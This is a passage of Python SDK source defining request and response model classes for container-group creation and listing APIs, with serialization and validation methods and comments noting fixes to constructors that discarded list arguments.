class CreateContainerGroupRequestInitContainerEnvironmentVarFieldRef(TeaModel):
    """A field reference used as the source of an env var value."""
    def __init__(self, field_path=None):
        self.field_path = field_path
    def validate(self):
        """`field_path` is optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'FieldPath': self.field_path}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.field_path = map.get('FieldPath')
        return self
class CreateContainerGroupRequestInitContainerEnvironmentVar(TeaModel):
    """An environment variable of an init container; value may come from a field ref."""
    def __init__(self, key=None, value=None, field_ref=None):
        self.key = key
        self.value = value
        self.field_ref = field_ref   # sub-model (required)
    def validate(self):
        """`field_ref` is required; cascade its validation when present."""
        self.validate_required(self.field_ref, 'field_ref')
        if self.field_ref:
            self.field_ref.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {
            'Key': self.key,
            'Value': self.value,
            'FieldRef': self.field_ref.to_map() if self.field_ref is not None else None,
        }
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.key = map.get('Key')
        self.value = map.get('Value')
        raw = map.get('FieldRef')
        self.field_ref = (CreateContainerGroupRequestInitContainerEnvironmentVarFieldRef().from_map(raw)
                          if raw is not None else None)
        return self
class CreateContainerGroupRequestInitContainerSecurityContextCapability(TeaModel):
    """Capabilities to add in an init container's security context.

    Fix over the generated original: ``__init__`` ignored its ``add``
    argument and always reset the field to an empty list; the caller's
    value is now honoured.
    """
    def __init__(self, add=None):
        # Honour the caller-supplied list; default to a fresh empty list.
        self.add = add if add is not None else []
    def validate(self):
        """`add` is required (must be present)."""
        self.validate_required(self.add, 'add')
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Add': list(self.add) if self.add is not None else None}
    def from_map(self, map=None):
        """Populate from a wire-format dict; returns self for chaining."""
        map = map if map is not None else {}
        self.add = list(map['Add']) if map.get('Add') is not None else None
        return self
class CreateContainerGroupRequestInitContainerSecurityContext(TeaModel):
    """Security context of an init container: capability sub-model plus scalar flags."""
    def __init__(self, capability=None, read_only_root_filesystem=None, run_as_user=None):
        self.capability = capability                              # sub-model (required)
        self.read_only_root_filesystem = read_only_root_filesystem
        self.run_as_user = run_as_user
    def validate(self):
        """`capability` is required; cascade its validation when present."""
        self.validate_required(self.capability, 'capability')
        if self.capability:
            self.capability.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        capability = self.capability.to_map() if self.capability is not None else None
        return {
            'Capability': capability,
            'ReadOnlyRootFilesystem': self.read_only_root_filesystem,
            'RunAsUser': self.run_as_user,
        }
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        raw = map.get('Capability')
        self.capability = (CreateContainerGroupRequestInitContainerSecurityContextCapability().from_map(raw)
                           if raw is not None else None)
        self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
        self.run_as_user = map.get('RunAsUser')
        return self
class CreateContainerGroupRequestInitContainer(TeaModel):
    """An init container definition inside a CreateContainerGroup request.

    Fix over the generated original: ``__init__`` discarded the
    caller-supplied ``command``/``arg``/``volume_mount``/``port``/
    ``environment_var`` arguments and always reset them to empty lists;
    they are now honoured.
    """
    def __init__(self, name=None, image=None, cpu=None, memory=None,
                 working_dir=None, image_pull_policy=None, command=None,
                 arg=None, volume_mount=None, port=None, environment_var=None,
                 security_context=None, gpu=None, termination_message_path=None,
                 termination_message_policy=None):
        self.name = name
        self.image = image
        self.cpu = cpu
        self.memory = memory
        self.working_dir = working_dir
        self.image_pull_policy = image_pull_policy
        # List fields: honour caller-supplied values, defaulting to [].
        self.command = command if command is not None else []
        self.arg = arg if arg is not None else []
        self.volume_mount = volume_mount if volume_mount is not None else []
        self.port = port if port is not None else []
        self.environment_var = environment_var if environment_var is not None else []
        self.security_context = security_context
        self.gpu = gpu
        self.termination_message_path = termination_message_path
        self.termination_message_policy = termination_message_policy
    def validate(self):
        """Validate required list/model fields and cascade into sub-models."""
        self.validate_required(self.command, 'command')
        self.validate_required(self.arg, 'arg')
        for required_name, models in (('volume_mount', self.volume_mount),
                                      ('port', self.port),
                                      ('environment_var', self.environment_var)):
            self.validate_required(models, required_name)
            if models:
                for k in models:
                    if k:
                        k.validate()
        self.validate_required(self.security_context, 'security_context')
        if self.security_context:
            self.security_context.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        def dump(models):
            # List of sub-models -> list of dicts; a None list stays None.
            if models is None:
                return None
            return [m.to_map() if m else None for m in models]
        return {
            'Name': self.name,
            'Image': self.image,
            'Cpu': self.cpu,
            'Memory': self.memory,
            'WorkingDir': self.working_dir,
            'ImagePullPolicy': self.image_pull_policy,
            'Command': list(self.command) if self.command is not None else None,
            'Arg': list(self.arg) if self.arg is not None else None,
            'VolumeMount': dump(self.volume_mount),
            'Port': dump(self.port),
            'EnvironmentVar': dump(self.environment_var),
            'SecurityContext': self.security_context.to_map() if self.security_context is not None else None,
            'Gpu': self.gpu,
            'TerminationMessagePath': self.termination_message_path,
            'TerminationMessagePolicy': self.termination_message_policy,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict; returns self for chaining."""
        map = map if map is not None else {}
        def load(key, model_cls):
            # List of dicts -> list of model_cls; missing/None key -> None.
            items = map.get(key)
            if items is None:
                return None
            return [model_cls().from_map(k) for k in items]
        self.name = map.get('Name')
        self.image = map.get('Image')
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        self.working_dir = map.get('WorkingDir')
        self.image_pull_policy = map.get('ImagePullPolicy')
        self.command = list(map['Command']) if map.get('Command') is not None else None
        self.arg = list(map['Arg']) if map.get('Arg') is not None else None
        self.volume_mount = load('VolumeMount', CreateContainerGroupRequestInitContainerVolumeMount)
        self.port = load('Port', CreateContainerGroupRequestInitContainerPort)
        self.environment_var = load('EnvironmentVar', CreateContainerGroupRequestInitContainerEnvironmentVar)
        raw = map.get('SecurityContext')
        self.security_context = (CreateContainerGroupRequestInitContainerSecurityContext().from_map(raw)
                                 if raw is not None else None)
        self.gpu = map.get('Gpu')
        self.termination_message_path = map.get('TerminationMessagePath')
        self.termination_message_policy = map.get('TerminationMessagePolicy')
        return self
class CreateContainerGroupRequestDnsConfigOption(TeaModel):
    """One name/value resolver option of the DNS config."""
    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value
    def validate(self):
        """Both fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Name': self.name, 'Value': self.value}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.name, self.value = map.get('Name'), map.get('Value')
        return self
class CreateContainerGroupRequestDnsConfig(TeaModel):
    """DNS configuration: name servers, search domains and resolver options.

    Fix over the generated original: ``__init__`` discarded all three
    arguments and always reset the fields to empty lists; the caller's
    values are now honoured.
    """
    def __init__(self, name_server=None, search=None, option=None):
        self.name_server = name_server if name_server is not None else []
        self.search = search if search is not None else []
        self.option = option if option is not None else []
    def validate(self):
        """Cascade validation into each option sub-model."""
        if self.option:
            for k in self.option:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        if self.option is None:
            options = None
        else:
            options = [k.to_map() if k else None for k in self.option]
        return {
            'NameServer': list(self.name_server) if self.name_server is not None else None,
            'Search': list(self.search) if self.search is not None else None,
            'Option': options,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict; returns self for chaining."""
        map = map if map is not None else {}
        self.name_server = list(map['NameServer']) if map.get('NameServer') is not None else None
        self.search = list(map['Search']) if map.get('Search') is not None else None
        if map.get('Option') is not None:
            self.option = [CreateContainerGroupRequestDnsConfigOption().from_map(k)
                           for k in map['Option']]
        else:
            self.option = None
        return self
class CreateContainerGroupRequestHostAliase(TeaModel):
    """One IP mapped to a list of hostnames.

    Fix over the generated original: ``__init__`` ignored its ``hostname``
    argument and always reset it to an empty list; the caller's value is
    now honoured.
    """
    def __init__(self, ip=None, hostname=None):
        self.ip = ip
        self.hostname = hostname if hostname is not None else []
    def validate(self):
        """`hostname` is required (must be present)."""
        self.validate_required(self.hostname, 'hostname')
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {
            'Ip': self.ip,
            'Hostname': list(self.hostname) if self.hostname is not None else None,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict; returns self for chaining."""
        map = map if map is not None else {}
        self.ip = map.get('Ip')
        self.hostname = list(map['Hostname']) if map.get('Hostname') is not None else None
        return self
class CreateContainerGroupRequestArn(TeaModel):
    """RAM role ARN settings used when the container group assumes a role."""

    def __init__(self, role_arn=None, role_type=None, assume_role_for=None):
        self.role_arn = role_arn
        self.role_type = role_type
        self.assume_role_for = assume_role_for

    def validate(self):
        # All fields are optional.
        pass

    def to_map(self):
        return {
            'RoleArn': self.role_arn,
            'RoleType': self.role_type,
            'AssumeRoleFor': self.assume_role_for,
        }

    def from_map(self, map={}):
        for attr, key in (('role_arn', 'RoleArn'),
                          ('role_type', 'RoleType'),
                          ('assume_role_for', 'AssumeRoleFor')):
            setattr(self, attr, map.get(key))
        return self
class CreateContainerGroupRequestSecurityContextSysctl(TeaModel):
    """A single sysctl (kernel parameter) name/value pair."""

    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value

    def validate(self):
        # Nothing is required.
        pass

    def to_map(self):
        result = {}
        for key, val in (('Name', self.name), ('Value', self.value)):
            result[key] = val
        return result

    def from_map(self, map={}):
        self.name = map.get('Name')
        self.value = map.get('Value')
        return self
class CreateContainerGroupRequestSecurityContext(TeaModel):
    """Group-level security context: the sysctls to apply."""

    def __init__(self, sysctl=None):
        # Bug fix: the sysctl argument was previously discarded and the field
        # always reset to []; honor a caller-supplied list of
        # CreateContainerGroupRequestSecurityContextSysctl.
        self.sysctl = sysctl if sysctl is not None else []

    def validate(self):
        if self.sysctl:
            for k in self.sysctl:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize; a None list serializes as None."""
        result = {}
        if self.sysctl is not None:
            result['Sysctl'] = [k.to_map() if k else None for k in self.sysctl]
        else:
            result['Sysctl'] = None
        return result

    def from_map(self, map=None):
        """Populate fields from *map*; returns self."""
        map = {} if map is None else map
        if map.get('Sysctl') is not None:
            self.sysctl = [
                CreateContainerGroupRequestSecurityContextSysctl().from_map(k)
                for k in map.get('Sysctl')
            ]
        else:
            self.sysctl = None
        return self
class CreateContainerGroupResponse(TeaModel):
    """Response of CreateContainerGroup: request id and the new group id."""

    def __init__(self, request_id=None, container_group_id=None):
        self.request_id = request_id
        self.container_group_id = container_group_id

    def validate(self):
        for val, label in ((self.request_id, 'request_id'),
                           (self.container_group_id, 'container_group_id')):
            self.validate_required(val, label)

    def to_map(self):
        return {
            'RequestId': self.request_id,
            'ContainerGroupId': self.container_group_id,
        }

    def from_map(self, map={}):
        self.request_id = map.get('RequestId')
        self.container_group_id = map.get('ContainerGroupId')
        return self
class DescribeContainerGroupsRequest(TeaModel):
    """Request parameters for the DescribeContainerGroups API."""

    def __init__(self, region_id=None, zone_id=None, v_switch_id=None, next_token=None, limit=None, tag=None, container_group_ids=None, container_group_name=None, status=None, resource_group_id=None, with_event=None):
        self.region_id = region_id
        self.zone_id = zone_id
        self.v_switch_id = v_switch_id
        self.next_token = next_token
        self.limit = limit
        # Bug fix: the tag argument was previously discarded and the field
        # always reset to []; honor a caller-supplied list of
        # DescribeContainerGroupsRequestTag.
        self.tag = tag if tag is not None else []
        self.container_group_ids = container_group_ids
        self.container_group_name = container_group_name
        self.status = status
        self.resource_group_id = resource_group_id
        self.with_event = with_event

    def validate(self):
        self.validate_required(self.region_id, 'region_id')
        if self.tag:
            for k in self.tag:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize to wire-format keys; a None tag list serializes as None."""
        result = {}
        result['RegionId'] = self.region_id
        result['ZoneId'] = self.zone_id
        result['VSwitchId'] = self.v_switch_id
        result['NextToken'] = self.next_token
        result['Limit'] = self.limit
        if self.tag is not None:
            result['Tag'] = [k.to_map() if k else None for k in self.tag]
        else:
            result['Tag'] = None
        result['ContainerGroupIds'] = self.container_group_ids
        result['ContainerGroupName'] = self.container_group_name
        result['Status'] = self.status
        result['ResourceGroupId'] = self.resource_group_id
        result['WithEvent'] = self.with_event
        return result

    def from_map(self, map=None):
        """Populate fields from *map*; returns self."""
        map = {} if map is None else map
        self.region_id = map.get('RegionId')
        self.zone_id = map.get('ZoneId')
        self.v_switch_id = map.get('VSwitchId')
        self.next_token = map.get('NextToken')
        self.limit = map.get('Limit')
        if map.get('Tag') is not None:
            self.tag = [DescribeContainerGroupsRequestTag().from_map(k)
                        for k in map.get('Tag')]
        else:
            self.tag = None
        self.container_group_ids = map.get('ContainerGroupIds')
        self.container_group_name = map.get('ContainerGroupName')
        self.status = map.get('Status')
        self.resource_group_id = map.get('ResourceGroupId')
        self.with_event = map.get('WithEvent')
        return self
class DescribeContainerGroupsRequestTag(TeaModel):
    """A tag filter (key/value) for DescribeContainerGroups."""

    def __init__(self, key=None, value=None):
        self.key = key
        self.value = value

    def validate(self):
        for val, label in ((self.key, 'key'), (self.value, 'value')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Key': self.key, 'Value': self.value}

    def from_map(self, map={}):
        self.key = map.get('Key')
        self.value = map.get('Value')
        return self
class DescribeContainerGroupsResponse(TeaModel):
    """Response of DescribeContainerGroups: paging info plus the groups."""

    def __init__(self, request_id=None, next_token=None, total_count=None, container_groups=None):
        self.request_id = request_id
        self.next_token = next_token
        self.total_count = total_count
        # Bug fix: the container_groups argument was previously discarded and
        # the field always reset to []; honor a caller-supplied list of
        # DescribeContainerGroupsResponseContainerGroups.
        self.container_groups = (container_groups
                                 if container_groups is not None else [])

    def validate(self):
        self.validate_required(self.request_id, 'request_id')
        self.validate_required(self.next_token, 'next_token')
        self.validate_required(self.total_count, 'total_count')
        self.validate_required(self.container_groups, 'container_groups')
        if self.container_groups:
            for k in self.container_groups:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize; a None group list serializes as None."""
        result = {}
        result['RequestId'] = self.request_id
        result['NextToken'] = self.next_token
        result['TotalCount'] = self.total_count
        if self.container_groups is not None:
            result['ContainerGroups'] = [k.to_map() if k else None
                                         for k in self.container_groups]
        else:
            result['ContainerGroups'] = None
        return result

    def from_map(self, map=None):
        """Populate fields from *map*; returns self."""
        map = {} if map is None else map
        self.request_id = map.get('RequestId')
        self.next_token = map.get('NextToken')
        self.total_count = map.get('TotalCount')
        if map.get('ContainerGroups') is not None:
            self.container_groups = [
                DescribeContainerGroupsResponseContainerGroups().from_map(k)
                for k in map.get('ContainerGroups')
            ]
        else:
            self.container_groups = None
        return self
class DescribeContainerGroupsResponseContainerGroupsTags(TeaModel):
    """A tag (key/value) attached to a returned container group."""

    def __init__(self, key=None, value=None):
        self.key = key
        self.value = value

    def validate(self):
        self.validate_required(self.key, 'key')
        self.validate_required(self.value, 'value')

    def to_map(self):
        return {'Key': self.key, 'Value': self.value}

    def from_map(self, map={}):
        for attr, key in (('key', 'Key'), ('value', 'Value')):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsEvents(TeaModel):
    """One event record attached to a container group."""

    def __init__(self, count=None, type=None, name=None, message=None, first_timestamp=None, last_timestamp=None, reason=None):
        self.count = count
        self.type = type
        self.name = name
        self.message = message
        self.first_timestamp = first_timestamp
        self.last_timestamp = last_timestamp
        self.reason = reason

    def validate(self):
        for val, label in ((self.count, 'count'), (self.type, 'type'),
                           (self.name, 'name'), (self.message, 'message'),
                           (self.first_timestamp, 'first_timestamp'),
                           (self.last_timestamp, 'last_timestamp'),
                           (self.reason, 'reason')):
            self.validate_required(val, label)

    def to_map(self):
        return {
            'Count': self.count,
            'Type': self.type,
            'Name': self.name,
            'Message': self.message,
            'FirstTimestamp': self.first_timestamp,
            'LastTimestamp': self.last_timestamp,
            'Reason': self.reason,
        }

    def from_map(self, map={}):
        for attr, key in (('count', 'Count'), ('type', 'Type'),
                          ('name', 'Name'), ('message', 'Message'),
                          ('first_timestamp', 'FirstTimestamp'),
                          ('last_timestamp', 'LastTimestamp'),
                          ('reason', 'Reason')):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersVolumeMounts(TeaModel):
    """A volume mount inside a container: volume name, path and mode."""

    def __init__(self, name=None, mount_path=None, read_only=None):
        self.name = name
        self.mount_path = mount_path
        self.read_only = read_only

    def validate(self):
        for val, label in ((self.name, 'name'),
                           (self.mount_path, 'mount_path'),
                           (self.read_only, 'read_only')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Name': self.name,
                'MountPath': self.mount_path,
                'ReadOnly': self.read_only}

    def from_map(self, map={}):
        self.name = map.get('Name')
        self.mount_path = map.get('MountPath')
        self.read_only = map.get('ReadOnly')
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersPorts(TeaModel):
    """An exposed container port and its protocol."""

    def __init__(self, port=None, protocol=None):
        self.port = port
        self.protocol = protocol

    def validate(self):
        for val, label in ((self.port, 'port'), (self.protocol, 'protocol')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Port': self.port, 'Protocol': self.protocol}

    def from_map(self, map={}):
        self.port = map.get('Port')
        self.protocol = map.get('Protocol')
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFromFieldRef(TeaModel):
    """A field reference (path of a pod field) used as an env-var source."""

    def __init__(self, field_path=None):
        self.field_path = field_path

    def validate(self):
        self.validate_required(self.field_path, 'field_path')

    def to_map(self):
        return {'FieldPath': self.field_path}

    def from_map(self, map={}):
        self.field_path = map.get('FieldPath')
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFrom(TeaModel):
    """Source of an env-var value; currently only a field reference."""

    def __init__(self, field_ref=None):
        self.field_ref = field_ref

    def validate(self):
        self.validate_required(self.field_ref, 'field_ref')
        if self.field_ref:
            self.field_ref.validate()

    def to_map(self):
        ref = self.field_ref
        return {'FieldRef': ref.to_map() if ref is not None else None}

    def from_map(self, map={}):
        if map.get('FieldRef') is None:
            self.field_ref = None
        else:
            self.field_ref = DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFromFieldRef().from_map(map['FieldRef'])
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVars(TeaModel):
    """An environment variable: key, literal value, or value source."""

    def __init__(self, key=None, value=None, value_from=None):
        self.key = key
        self.value = value
        self.value_from = value_from

    def validate(self):
        self.validate_required(self.key, 'key')
        self.validate_required(self.value, 'value')
        self.validate_required(self.value_from, 'value_from')
        if self.value_from:
            self.value_from.validate()

    def to_map(self):
        src = self.value_from
        return {
            'Key': self.key,
            'Value': self.value,
            'ValueFrom': src.to_map() if src is not None else None,
        }

    def from_map(self, map={}):
        self.key = map.get('Key')
        self.value = map.get('Value')
        if map.get('ValueFrom') is None:
            self.value_from = None
        else:
            self.value_from = DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVarsValueFrom().from_map(map['ValueFrom'])
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersPreviousState(TeaModel):
    """Container state before the most recent transition."""

    def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
        self.state = state
        self.detail_status = detail_status
        self.exit_code = exit_code
        self.start_time = start_time
        self.finish_time = finish_time
        self.reason = reason
        self.message = message
        self.signal = signal

    def validate(self):
        for val, label in ((self.state, 'state'),
                           (self.detail_status, 'detail_status'),
                           (self.exit_code, 'exit_code'),
                           (self.start_time, 'start_time'),
                           (self.finish_time, 'finish_time'),
                           (self.reason, 'reason'),
                           (self.message, 'message'),
                           (self.signal, 'signal')):
            self.validate_required(val, label)

    def to_map(self):
        return {
            'State': self.state,
            'DetailStatus': self.detail_status,
            'ExitCode': self.exit_code,
            'StartTime': self.start_time,
            'FinishTime': self.finish_time,
            'Reason': self.reason,
            'Message': self.message,
            'Signal': self.signal,
        }

    def from_map(self, map={}):
        for attr, key in (('state', 'State'), ('detail_status', 'DetailStatus'),
                          ('exit_code', 'ExitCode'), ('start_time', 'StartTime'),
                          ('finish_time', 'FinishTime'), ('reason', 'Reason'),
                          ('message', 'Message'), ('signal', 'Signal')):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersCurrentState(TeaModel):
    """Current container state."""

    def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
        self.state = state
        self.detail_status = detail_status
        self.exit_code = exit_code
        self.start_time = start_time
        self.finish_time = finish_time
        self.reason = reason
        self.message = message
        self.signal = signal

    def validate(self):
        for val, label in ((self.state, 'state'),
                           (self.detail_status, 'detail_status'),
                           (self.exit_code, 'exit_code'),
                           (self.start_time, 'start_time'),
                           (self.finish_time, 'finish_time'),
                           (self.reason, 'reason'),
                           (self.message, 'message'),
                           (self.signal, 'signal')):
            self.validate_required(val, label)

    def to_map(self):
        result = {}
        for key, val in (('State', self.state),
                         ('DetailStatus', self.detail_status),
                         ('ExitCode', self.exit_code),
                         ('StartTime', self.start_time),
                         ('FinishTime', self.finish_time),
                         ('Reason', self.reason),
                         ('Message', self.message),
                         ('Signal', self.signal)):
            result[key] = val
        return result

    def from_map(self, map={}):
        for key, attr in (('State', 'state'), ('DetailStatus', 'detail_status'),
                          ('ExitCode', 'exit_code'), ('StartTime', 'start_time'),
                          ('FinishTime', 'finish_time'), ('Reason', 'reason'),
                          ('Message', 'message'), ('Signal', 'signal')):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeHttpGet(TeaModel):
    """HTTP GET action of a readiness probe: path, port and scheme."""

    def __init__(self, path=None, port=None, scheme=None):
        self.path = path
        self.port = port
        self.scheme = scheme

    def validate(self):
        for val, label in ((self.path, 'path'), (self.port, 'port'),
                           (self.scheme, 'scheme')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Path': self.path, 'Port': self.port, 'Scheme': self.scheme}

    def from_map(self, map={}):
        for attr, key in (('path', 'Path'), ('port', 'Port'),
                          ('scheme', 'Scheme')):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeTcpSocket(TeaModel):
    """TCP socket action of a readiness probe: host and port."""

    def __init__(self, host=None, port=None):
        self.host = host
        self.port = port

    def validate(self):
        for val, label in ((self.host, 'host'), (self.port, 'port')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Host': self.host, 'Port': self.port}

    def from_map(self, map={}):
        self.host = map.get('Host')
        self.port = map.get('Port')
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbe(TeaModel):
    """Readiness probe of a container (HTTP, TCP or exec based)."""

    def __init__(self, initial_delay_seconds=None, period_seconds=None, timeout_seconds=None, success_threshold=None, failure_threshold=None, http_get=None, tcp_socket=None, execs=None):
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.timeout_seconds = timeout_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.http_get = http_get
        self.tcp_socket = tcp_socket
        # Bug fix: the execs argument was previously discarded and the field
        # always reset to []; honor a caller-supplied list of command strings.
        self.execs = execs if execs is not None else []

    def validate(self):
        self.validate_required(self.initial_delay_seconds, 'initial_delay_seconds')
        self.validate_required(self.period_seconds, 'period_seconds')
        self.validate_required(self.timeout_seconds, 'timeout_seconds')
        self.validate_required(self.success_threshold, 'success_threshold')
        self.validate_required(self.failure_threshold, 'failure_threshold')
        self.validate_required(self.http_get, 'http_get')
        if self.http_get:
            self.http_get.validate()
        self.validate_required(self.tcp_socket, 'tcp_socket')
        if self.tcp_socket:
            self.tcp_socket.validate()
        self.validate_required(self.execs, 'execs')

    def to_map(self):
        """Serialize; None sub-objects/lists serialize as None."""
        result = {}
        result['InitialDelaySeconds'] = self.initial_delay_seconds
        result['PeriodSeconds'] = self.period_seconds
        result['TimeoutSeconds'] = self.timeout_seconds
        result['SuccessThreshold'] = self.success_threshold
        result['FailureThreshold'] = self.failure_threshold
        result['HttpGet'] = (self.http_get.to_map()
                             if self.http_get is not None else None)
        result['TcpSocket'] = (self.tcp_socket.to_map()
                               if self.tcp_socket is not None else None)
        result['Execs'] = list(self.execs) if self.execs is not None else None
        return result

    def from_map(self, map=None):
        """Populate fields from *map*; returns self."""
        map = {} if map is None else map
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.timeout_seconds = map.get('TimeoutSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        if map.get('HttpGet') is not None:
            self.http_get = DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeHttpGet().from_map(map['HttpGet'])
        else:
            self.http_get = None
        if map.get('TcpSocket') is not None:
            self.tcp_socket = DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbeTcpSocket().from_map(map['TcpSocket'])
        else:
            self.tcp_socket = None
        execs = map.get('Execs')
        self.execs = list(execs) if execs is not None else None
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeHttpGet(TeaModel):
    """HTTP GET action of a liveness probe: path, port and scheme."""

    def __init__(self, path=None, port=None, scheme=None):
        self.path = path
        self.port = port
        self.scheme = scheme

    def validate(self):
        for val, label in ((self.path, 'path'), (self.port, 'port'),
                           (self.scheme, 'scheme')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Path': self.path, 'Port': self.port, 'Scheme': self.scheme}

    def from_map(self, map={}):
        for attr, key in (('path', 'Path'), ('port', 'Port'),
                          ('scheme', 'Scheme')):
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeTcpSocket(TeaModel):
    """TCP socket action of a liveness probe: host and port."""

    def __init__(self, host=None, port=None):
        self.host = host
        self.port = port

    def validate(self):
        for val, label in ((self.host, 'host'), (self.port, 'port')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Host': self.host, 'Port': self.port}

    def from_map(self, map={}):
        self.host = map.get('Host')
        self.port = map.get('Port')
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbe(TeaModel):
    """Liveness probe of a container (HTTP, TCP or exec based)."""

    def __init__(self, initial_delay_seconds=None, period_seconds=None, timeout_seconds=None, success_threshold=None, failure_threshold=None, http_get=None, tcp_socket=None, execs=None):
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.timeout_seconds = timeout_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.http_get = http_get
        self.tcp_socket = tcp_socket
        # Bug fix: the execs argument was previously discarded and the field
        # always reset to []; honor a caller-supplied list of command strings.
        self.execs = execs if execs is not None else []

    def validate(self):
        self.validate_required(self.initial_delay_seconds, 'initial_delay_seconds')
        self.validate_required(self.period_seconds, 'period_seconds')
        self.validate_required(self.timeout_seconds, 'timeout_seconds')
        self.validate_required(self.success_threshold, 'success_threshold')
        self.validate_required(self.failure_threshold, 'failure_threshold')
        self.validate_required(self.http_get, 'http_get')
        if self.http_get:
            self.http_get.validate()
        self.validate_required(self.tcp_socket, 'tcp_socket')
        if self.tcp_socket:
            self.tcp_socket.validate()
        self.validate_required(self.execs, 'execs')

    def to_map(self):
        """Serialize; None sub-objects/lists serialize as None."""
        result = {}
        result['InitialDelaySeconds'] = self.initial_delay_seconds
        result['PeriodSeconds'] = self.period_seconds
        result['TimeoutSeconds'] = self.timeout_seconds
        result['SuccessThreshold'] = self.success_threshold
        result['FailureThreshold'] = self.failure_threshold
        result['HttpGet'] = (self.http_get.to_map()
                             if self.http_get is not None else None)
        result['TcpSocket'] = (self.tcp_socket.to_map()
                               if self.tcp_socket is not None else None)
        result['Execs'] = list(self.execs) if self.execs is not None else None
        return result

    def from_map(self, map=None):
        """Populate fields from *map*; returns self."""
        map = {} if map is None else map
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.timeout_seconds = map.get('TimeoutSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        if map.get('HttpGet') is not None:
            self.http_get = DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeHttpGet().from_map(map['HttpGet'])
        else:
            self.http_get = None
        if map.get('TcpSocket') is not None:
            self.tcp_socket = DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbeTcpSocket().from_map(map['TcpSocket'])
        else:
            self.tcp_socket = None
        execs = map.get('Execs')
        self.execs = list(execs) if execs is not None else None
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersSecurityContextCapability(TeaModel):
    """Linux capabilities added to the container's security context."""

    def __init__(self, adds=None):
        # Bug fix: the adds argument was previously discarded and the field
        # always reset to []; honor a caller-supplied list of capability names.
        self.adds = adds if adds is not None else []

    def validate(self):
        self.validate_required(self.adds, 'adds')

    def to_map(self):
        """Serialize; a None list serializes as None."""
        return {'Adds': list(self.adds) if self.adds is not None else None}

    def from_map(self, map=None):
        """Populate fields from *map*; returns self."""
        map = {} if map is None else map
        adds = map.get('Adds')
        self.adds = list(adds) if adds is not None else None
        return self
class DescribeContainerGroupsResponseContainerGroupsContainersSecurityContext(TeaModel):
    """Container security context: root-FS mode, run-as user, capabilities."""

    def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
        self.read_only_root_filesystem = read_only_root_filesystem
        self.run_as_user = run_as_user
        self.capability = capability

    def validate(self):
        for val, label in ((self.read_only_root_filesystem, 'read_only_root_filesystem'),
                           (self.run_as_user, 'run_as_user'),
                           (self.capability, 'capability')):
            self.validate_required(val, label)
        if self.capability:
            self.capability.validate()

    def to_map(self):
        cap = self.capability
        return {
